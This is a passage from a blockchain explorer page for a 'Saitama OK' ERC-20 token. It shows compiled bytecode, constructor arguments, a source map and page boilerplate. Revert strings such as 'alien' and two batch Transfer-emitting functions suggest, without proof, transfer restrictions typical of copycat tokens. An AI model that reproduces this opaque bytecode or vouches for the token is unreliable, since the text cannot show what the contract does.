5b600060208201905061155d6000830184611539565b92915050565b61156c816114b7565b82525050565b60006020820190506115876000830184611563565b92915050565b6000806000606084860312156115a6576115a561144f565b5b60006115b4868287016114a2565b93505060206115c5868287016114a2565b92505060406115d6868287016114d8565b9150509250925092565b600060ff82169050919050565b6115f6816115e0565b82525050565b600060208201905061161160008301846115ed565b92915050565b60006020828403121561162d5761162c61144f565b5b600061163b848285016114a2565b91505092915050565b61164d81611479565b82525050565b60006020820190506116686000830184611644565b92915050565b600080604083850312156116855761168461144f565b5b6000611693858286016114a2565b92505060206116a4858286016114a2565b9150509250929050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6116eb826113d9565b810181811067ffffffffffffffff8211171561170a576117096116b3565b5b80604052505050565b600061171d611445565b905061172982826116e2565b919050565b600067ffffffffffffffff821115611749576117486116b3565b5b602082029050602081019050919050565b600080fd5b600061177261176d8461172e565b611713565b905080838252602082019050602084028301858111156117955761179461175a565b5b835b818110156117be57806117aa88826114a2565b845260208401935050602081019050611797565b5050509392505050565b600082601f8301126117dd576117dc6116ae565b5b81356117ed84826020860161175f565b91505092915050565b6000806040838503121561180d5761180c61144f565b5b600083013567ffffffffffffffff81111561182b5761182a611454565b5b611837858286016117c8565b9250506020611848858286016114d8565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061189957607f821691505b6020821081036118ac576118ab611852565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006118e860208361139e565b91506118f3826118b2565b602082019050919050565b60006020820190508181036000830152611917816118db565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061197a60268361139e565b91506119858261191e565b604082019050919050565b600060208201905081810360008301526119a98161196d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611a19826114b7565b9150611a24836114b7565b925082611a3457611a336119b0565b5b828204905092915050565b6000611a4a826114b7565b9150611a55836114b7565b9250828201905080821115611a6d57611a6c6119df565b5b92915050565b6000611a7e826114b7565b9150611a89836114b7565b9250828202611a97816114b7565b91508282048414831517611aae57611aad6119df565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000611aef826114b7565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611b2157611b206119df565b5b600182019050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611b8860248361139e565b9150611b9382611b2c565b604082019050919050565b60006020820190508181036000830152611bb781611b7b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611c1a60228361139e565b9150611c2582611bbe565b604082019050919050565b60006020820190508181036000830152611c4981611c0d565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611cac60258361139e565b9150611cb782611c50565b604082019050919050565b60006020820190508181036000830152611cdb81611c9f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d3e60238361139e565b9150611d4982611ce2565b604082019050919050565b60006020820190508181036000830152611d6d81611d31565b9050919050565b6000611d7f826114b7565b9150611d8a836114b7565b9250828203905081811115611da257611da16119df565b5b92915050565b7f616c69656e000000000000000000000000000000000000000000000000000000600082015250565b6000611dde60058361139e565b9150611de982611da8565b602082019050919050565b60006020820190508181036000830152611e0d81611dd1565b9050919050565b7f696e76616c696420616464726573730000000000000000000000000000000000600082015250565b6000611e4a600f8361139e565b9150611e5582611e14565b602082019050919050565b60006020820190508181036000830152611e7981611e3d565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220e827692d41d14ce2350d204254c138d78da400f7b8a28d6dc33e53bcc55066cf64736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000061073cf36fd3837525f23dbb79e56167a897d1d300000000000000000000000000000000000000000000000000000004a817c800000000000000000000000000000000000000000000000000000000000000000a53616974616d61204f4b00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000753414954414d4100000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Saitama OK
Arg [1] : symbol_ (string): SAITAMA
Arg [2] : _deployer (address): 0x61073Cf36fd3837525F23DBB79e56167a897d1D3
Arg [3] : totalSupply_ (uint256): 20000000000

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 00000000000000000000000061073cf36fd3837525f23dbb79e56167a897d1d3
Arg [3] : 00000000000000000000000000000000000000000000000000000004a817c800
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000a
Arg [5] : 53616974616d61204f4b00000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [7] : 53414954414d4100000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

16856:8268:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18414:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20392:192;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19262:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17530:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21066:450;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19106:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24189:114;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19433:157;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1467:94;;;:::i;:::-;;818:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18624:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19803:198;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20064:181;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1716:192;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22035:501;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21526;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18414:91;18459:13;18492:5;18485:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18414:91;:::o;20392:192::-;20495:4;20517:37;20526:10;20538:7;20547:6;20517:8;:37::i;:::-;20572:4;20565:11;;20392:192;;;;:::o;19262:108::-;19323:7;19350:12;;19343:19;;19262:108;:::o;17530:87::-;17576:7;17603:6;;17596:13;;17530:87;:::o;21066:450::-;21206:4;21223:36;21233:6;21241:9;21252:6;21223:9;:36::i;:::-;21270:216;21293:6;21314:10;21339:136;21393:6;21339:136;;;;;;;;;;;;;;;;;:11;:19;21351:6;21339:19;;;;;;;;;;;;;;;:31;21359:10;21339:31;;;;;;;;;;;;;;;;:35;;:136;;;;;:::i;:::-;21270:8;:216::i;:::-;21504:4;21497:11;;21066:450;;;;;:::o;19106:91::-;19155:5;19180:9;;;;;;;;;;;19173:16;;19106:91;:::o;24189:114::-;24246:7;24273:6;:15;24280:7;24273:15;;;;;;;;;;;;;;;:22;;;24266:29;;24189:114;;;:::o;19433:157::-;19532:7;19564:9;:18;19574:7;19564:18;;;;;;;;;;;;;;;;19557:25;;19433:157;;;:::o;1467:94::-;1049:10;1038:21;;:7;:5;:7::i;:::-;:21;;;1030:66;;;;;;;;;;;;:::i;:::-;;;;;;;;;1532:21:::1;1550:1;1532:9;:21::i;:::-;1467:94::o:0;818:87::-;864:7;891:6;;;;;;;;;;;884:13;;818:87;:::o;18624:95::-;18671:13;18704:7;18697:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18624:95;:::o;19803:198::-;19909:4;19931:40;19941:10;19953:9;19964:6;19931:9;:40::i;:::-;19989:4;19982:11;;19803:198;;;;:::o;20064:181::-;20178:7;20210:11;:18;20222:5;20210:18;;;;;;;;;;;;;;;:27;20229:7;20210:27;;;;;;;;;;;;;;;;20203:34;;20064:181;;;;:::o;1716:192::-;1049:10;1038:21;;:7;:5;:7::i;:::-;:21;;;1030:66;;;;;;;;;;;;:::i;:::-;;;;;;;;;1825:1:::1;1805:22;;:8;:22;;::::0;1797:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;1881:19;1891:8;1881:9;:19::i;:::-;1716:192:::0;:::o;22035:501::-;22110:4;22123:12;22138:10;22123:25;;22155:16;22174:1;22155:20;;22182:19;22215:1;22204:8;:12;;;;:::i;:::-;22182:34;;22223:15;22254:9;22249:266;22273:7;:14;22269:1;:18;22249:266;;;22316:1;22305:12;;;;;:::i;:::-;;;22328:19;22361:3;22350:8;:14;;;;:::i;:::-;22328:36;;22375;22386:4;22392:7;22400:1;22392:10;;;;;;;;:::i;:::-;;;;;;;;22404:6;22375:10;:36::i;:::-;22448:6;22422:11;:17;22434:4;22422:17;;;;;;;;;;;;;;;:23;22440:4;22422:23;;;;;;;;;;;;;;;:32;;;;22493:4;22470:37;;22479:4;22470:37;;;22500:6;22470:37;;;;;;:::i;:::-;;;;;;;;22294:221;22289:3;;;;;:::i;:::-;;;;22249:266;;;;22528:4;22521:11;;;;;;22035:501;;;;:::o;21526:::-;21601:4;21614:12;21629:10;21614:25;;21646:16;21665:1;21646:20;;21673:19;21706:1;21695:8;:12;;;;:::i;:::-;21673:34;;21714:15;21745:9;21740:266;21764:7;:14;21760:1;:18;21740:266;;;21807:1;21796:12;;;;;:::i;:::-;;;21819:19;21852:3;21841:8;:14;;;;:::i;:::-;21819:36;;21866;21877:4;21883:7;21891:1;21883:10;;;;;;;;:::i;:::-;;;;;;;;21895:6;21866:10;:36::i;:::-;21939:6;21913:11;:17;21925:4;21913:17;;;;;;;;;;;;;;;:23;21931:4;21913:23;;;;;;;;;;;;;;;:32;;;;21984:4;21961:37;;21970:4;21961:37;;;21991:6;21961:37;;;;;;:::i;:::-;;;;;;;;21785:221;21780:3;;;;;:::i;:::-;;;;21740:266;;;;22019:4;22012:11;;;;;;21526:501;;;;:::o;13408:98::-;13466:7;13497:1;13493;:5;;;;:::i;:::-;13486:12;;13408:98;;;;:::o;24741:380::-;24894:1;24877:19;;:5;:19;;;24869:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;24975:1;24956:21;;:7;:21;;;24948:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;25059:6;25029:11;:18;25041:5;25029:18;;;;;;;;;;;;;;;:27;25048:7;25029:27;;;;;;;;;;;;;;;:36;;;;25097:7;25081:32;;25090:5;25081:32;;;25106:6;25081:32;;;;;;:::i;:::-;;;;;;;;24741:380;;;:::o;23503:613::-;23661:1;23643:20;;:6;:20;;;23635:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;23745:1;23724:23;;:9;:23;;;23716:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;23839:1;23815:6;:14;23822:6;23815:14;;;;;;;;;;;;;;;:21;;;23806:6;:30;;;;:::i;:::-;:34;23798:52;;;;;;;;;;;;:::i;:::-;;;;;;;;;23883:108;23919:6;23883:108;;;;;;;;;;;;;;;;;:9;:17;23893:6;23883:17;;;;;;;;;;;;;;;;:21;;:108;;;;;:::i;:::-;23863:9;:17;23873:6;23863:17;;;;;;;;;;;;;;;:128;;;;24025:32;24050:6;24025:9;:20;24035:9;24025:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;24002:9;:20;24012:9;24002:20;;;;;;;;;;;;;;;:55;;;;24090:9;24073:35;;24082:6;24073:35;;;24101:6;24073:35;;;;;;:::i;:::-;;;;;;;;23503:613;;;:::o;15039:224::-;15159:7;15209:1;15204;:6;;15212:12;15196:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;15247:1;15243;:5;15236:12;;15039:224;;;;;:::o;1916:173::-;1972:16;1991:6;;;;;;;;;;;1972:25;;2017:8;2008:6;;:17;;;;;;;;;;;;;;;;;;2072:8;2041:40;;2062:8;2041:40;;;;;;;;;;;;1961:128;1916:173;:::o;22548:461::-;22635:15;22692:1;22673:21;;:7;:21;;;22665:49;;;;;;;;;;;;:::i;:::-;;;;;;;;;22737:9;:16;;;;;;;;;;;;22729:24;;:4;:24;;;22725:277;;22793:7;22770:6;:12;22777:4;22770:12;;;;;;;;;;;;;;;:19;;;:30;;;;;;;:::i;:::-;;;;;;;;22841:7;22815:6;:15;22822:7;22815:15;;;;;;;;;;;;;;;:22;;;:33;;;;;;;:::i;:::-;;;;;;;;22725:277;;;22904:7;22881:6;:12;22888:4;22881:12;;;;;;;;;;;;;;;:19;;;:30;;;;;;;:::i;:::-;;;;;;;;22937:6;22926:17;;;;;:::i;:::-;;;22983:7;22958:6;:15;22965:7;22958:15;;;;;;;;;;;;;;;:22;;:32;;;;22725:277;22624:385;22548:461;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1349:75::-;1382:6;1415:2;1409:9;1399:19;;1349:75;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:474::-;5608:6;5616;5665:2;5653:9;5644:7;5640:23;5636:32;5633:119;;;5671:79;;:::i;:::-;5633:119;5791:1;5816:53;5861:7;5852:6;5841:9;5837:22;5816:53;:::i;:::-;5806:63;;5762:117;5918:2;5944:53;5989:7;5980:6;5969:9;5965:22;5944:53;:::i;:::-;5934:63;;5889:118;5540:474;;;;;:::o;6020:117::-;6129:1;6126;6119:12;6143:180;6191:77;6188:1;6181:88;6288:4;6285:1;6278:15;6312:4;6309:1;6302:15;6329:281;6412:27;6434:4;6412:27;:::i;:::-;6404:6;6400:40;6542:6;6530:10;6527:22;6506:18;6494:10;6491:34;6488:62;6485:88;;;6553:18;;:::i;:::-;6485:88;6593:10;6589:2;6582:22;6372:238;6329:281;;:::o;6616:129::-;6650:6;6677:20;;:::i;:::-;6667:30;;6706:33;6734:4;6726:6;6706:33;:::i;:::-;6616:129;;;:::o;6751:311::-;6828:4;6918:18;6910:6;6907:30;6904:56;;;6940:18;;:::i;:::-;6904:56;6990:4;6982:6;6978:17;6970:25;;7050:4;7044;7040:15;7032:23;;6751:311;;;:::o;7068:117::-;7177:1;7174;7167:12;7208:710;7304:5;7329:81;7345:64;7402:6;7345:64;:::i;:::-;7329:81;:::i;:::-;7320:90;;7430:5;7459:6;7452:5;7445:21;7493:4;7486:5;7482:16;7475:23;;7546:4;7538:6;7534:17;7526:6;7522:30;7575:3;7567:6;7564:15;7561:122;;;7594:79;;:::i;:::-;7561:122;7709:6;7692:220;7726:6;7721:3;7718:15;7692:220;;;7801:3;7830:37;7863:3;7851:10;7830:37;:::i;:::-;7825:3;7818:50;7897:4;7892:3;7888:14;7881:21;;7768:144;7752:4;7747:3;7743:14;7736:21;;7692:220;;;7696:21;7310:608;;7208:710;;;;;:::o;7941:370::-;8012:5;8061:3;8054:4;8046:6;8042:17;8038:27;8028:122;;8069:79;;:::i;:::-;8028:122;8186:6;8173:20;8211:94;8301:3;8293:6;8286:4;8278:6;8274:17;8211:94;:::i;:::-;8202:103;;8018:293;7941:370;;;;:::o;8317:684::-;8410:6;8418;8467:2;8455:9;8446:7;8442:23;8438:32;8435:119;;;8473:79;;:::i;:::-;8435:119;8621:1;8610:9;8606:17;8593:31;8651:18;8643:6;8640:30;8637:117;;;8673:79;;:::i;:::-;8637:117;8778:78;8848:7;8839:6;8828:9;8824:22;8778:78;:::i;:::-;8768:88;;8564:302;8905:2;8931:53;8976:7;8967:6;8956:9;8952:22;8931:53;:::i;:::-;8921:63;;8876:118;8317:684;;;;;:::o;9007:180::-;9055:77;9052:1;9045:88;9152:4;9149:1;9142:15;9176:4;9173:1;9166:15;9193:320;9237:6;9274:1;9268:4;9264:12;9254:22;;9321:1;9315:4;9311:12;9342:18;9332:81;;9398:4;9390:6;9386:17;9376:27;;9332:81;9460:2;9452:6;9449:14;9429:18;9426:38;9423:84;;9479:18;;:::i;:::-;9423:84;9244:269;9193:320;;;:::o;9519:182::-;9659:34;9655:1;9647:6;9643:14;9636:58;9519:182;:::o;9707:366::-;9849:3;9870:67;9934:2;9929:3;9870:67;:::i;:::-;9863:74;;9946:93;10035:3;9946:93;:::i;:::-;10064:2;10059:3;10055:12;10048:19;;9707:366;;;:::o;10079:419::-;10245:4;10283:2;10272:9;10268:18;10260:26;;10332:9;10326:4;10322:20;10318:1;10307:9;10303:17;10296:47;10360:131;10486:4;10360:131;:::i;:::-;10352:139;;10079:419;;;:::o;10504:225::-;10644:34;10640:1;10632:6;10628:14;10621:58;10713:8;10708:2;10700:6;10696:15;10689:33;10504:225;:::o;10735:366::-;10877:3;10898:67;10962:2;10957:3;10898:67;:::i;:::-;10891:74;;10974:93;11063:3;10974:93;:::i;:::-;11092:2;11087:3;11083:12;11076:19;;10735:366;;;:::o;11107:419::-;11273:4;11311:2;11300:9;11296:18;11288:26;;11360:9;11354:4;11350:20;11346:1;11335:9;11331:17;11324:47;11388:131;11514:4;11388:131;:::i;:::-;11380:139;;11107:419;;;:::o;11532:180::-;11580:77;11577:1;11570:88;11677:4;11674:1;11667:15;11701:4;11698:1;11691:15;11718:180;11766:77;11763:1;11756:88;11863:4;11860:1;11853:15;11887:4;11884:1;11877:15;11904:185;11944:1;11961:20;11979:1;11961:20;:::i;:::-;11956:25;;11995:20;12013:1;11995:20;:::i;:::-;11990:25;;12034:1;12024:35;;12039:18;;:::i;:::-;12024:35;12081:1;12078;12074:9;12069:14;;11904:185;;;;:::o;12095:191::-;12135:3;12154:20;12172:1;12154:20;:::i;:::-;12149:25;;12188:20;12206:1;12188:20;:::i;:::-;12183:25;;12231:1;12228;12224:9;12217:16;;12252:3;12249:1;12246:10;12243:36;;;12259:18;;:::i;:::-;12243:36;12095:191;;;;:::o;12292:410::-;12332:7;12355:20;12373:1;12355:20;:::i;:::-;12350:25;;12389:20;12407:1;12389:20;:::i;:::-;12384:25;;12444:1;12441;12437:9;12466:30;12484:11;12466:30;:::i;:::-;12455:41;;12645:1;12636:7;12632:15;12629:1;12626:22;12606:1;12599:9;12579:83;12556:139;;12675:18;;:::i;:::-;12556:139;12340:362;12292:410;;;;:::o;12708:180::-;12756:77;12753:1;12746:88;12853:4;12850:1;12843:15;12877:4;12874:1;12867:15;12894:233;12933:3;12956:24;12974:5;12956:24;:::i;:::-;12947:33;;13002:66;12995:5;12992:77;12989:103;;13072:18;;:::i;:::-;12989:103;13119:1;13112:5;13108:13;13101:20;;12894:233;;;:::o;13133:223::-;13273:34;13269:1;13261:6;13257:14;13250:58;13342:6;13337:2;13329:6;13325:15;13318:31;13133:223;:::o;13362:366::-;13504:3;13525:67;13589:2;13584:3;13525:67;:::i;:::-;13518:74;;13601:93;13690:3;13601:93;:::i;:::-;13719:2;13714:3;13710:12;13703:19;;13362:366;;;:::o;13734:419::-;13900:4;13938:2;13927:9;13923:18;13915:26;;13987:9;13981:4;13977:20;13973:1;13962:9;13958:17;13951:47;14015:131;14141:4;14015:131;:::i;:::-;14007:139;;13734:419;;;:::o;14159:221::-;14299:34;14295:1;14287:6;14283:14;14276:58;14368:4;14363:2;14355:6;14351:15;14344:29;14159:221;:::o;14386:366::-;14528:3;14549:67;14613:2;14608:3;14549:67;:::i;:::-;14542:74;;14625:93;14714:3;14625:93;:::i;:::-;14743:2;14738:3;14734:12;14727:19;;14386:366;;;:::o;14758:419::-;14924:4;14962:2;14951:9;14947:18;14939:26;;15011:9;15005:4;15001:20;14997:1;14986:9;14982:17;14975:47;15039:131;15165:4;15039:131;:::i;:::-;15031:139;;14758:419;;;:::o;15183:224::-;15323:34;15319:1;15311:6;15307:14;15300:58;15392:7;15387:2;15379:6;15375:15;15368:32;15183:224;:::o;15413:366::-;15555:3;15576:67;15640:2;15635:3;15576:67;:::i;:::-;15569:74;;15652:93;15741:3;15652:93;:::i;:::-;15770:2;15765:3;15761:12;15754:19;;15413:366;;;:::o;15785:419::-;15951:4;15989:2;15978:9;15974:18;15966:26;;16038:9;16032:4;16028:20;16024:1;16013:9;16009:17;16002:47;16066:131;16192:4;16066:131;:::i;:::-;16058:139;;15785:419;;;:::o;16210:222::-;16350:34;16346:1;16338:6;16334:14;16327:58;16419:5;16414:2;16406:6;16402:15;16395:30;16210:222;:::o;16438:366::-;16580:3;16601:67;16665:2;16660:3;16601:67;:::i;:::-;16594:74;;16677:93;16766:3;16677:93;:::i;:::-;16795:2;16790:3;16786:12;16779:19;;16438:366;;;:::o;16810:419::-;16976:4;17014:2;17003:9;16999:18;16991:26;;17063:9;17057:4;17053:20;17049:1;17038:9;17034:17;17027:47;17091:131;17217:4;17091:131;:::i;:::-;17083:139;;16810:419;;;:::o;17235:194::-;17275:4;17295:20;17313:1;17295:20;:::i;:::-;17290:25;;17329:20;17347:1;17329:20;:::i;:::-;17324:25;;17373:1;17370;17366:9;17358:17;;17397:1;17391:4;17388:11;17385:37;;;17402:18;;:::i;:::-;17385:37;17235:194;;;;:::o;17435:155::-;17575:7;17571:1;17563:6;17559:14;17552:31;17435:155;:::o;17596:365::-;17738:3;17759:66;17823:1;17818:3;17759:66;:::i;:::-;17752:73;;17834:93;17923:3;17834:93;:::i;:::-;17952:2;17947:3;17943:12;17936:19;;17596:365;;;:::o;17967:419::-;18133:4;18171:2;18160:9;18156:18;18148:26;;18220:9;18214:4;18210:20;18206:1;18195:9;18191:17;18184:47;18248:131;18374:4;18248:131;:::i;:::-;18240:139;;17967:419;;;:::o;18392:165::-;18532:17;18528:1;18520:6;18516:14;18509:41;18392:165;:::o;18563:366::-;18705:3;18726:67;18790:2;18785:3;18726:67;:::i;:::-;18719:74;;18802:93;18891:3;18802:93;:::i;:::-;18920:2;18915:3;18911:12;18904:19;;18563:366;;;:::o;18935:419::-;19101:4;19139:2;19128:9;19124:18;19116:26;;19188:9;19182:4;19178:20;19174:1;19163:9;19159:17;19152:47;19216:131;19342:4;19216:131;:::i;:::-;19208:139;;18935:419;;;:::o

Swarm Source

ipfs://e827692d41d14ce2350d204254c138d78da400f7b8a28d6dc33e53bcc55066cf
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.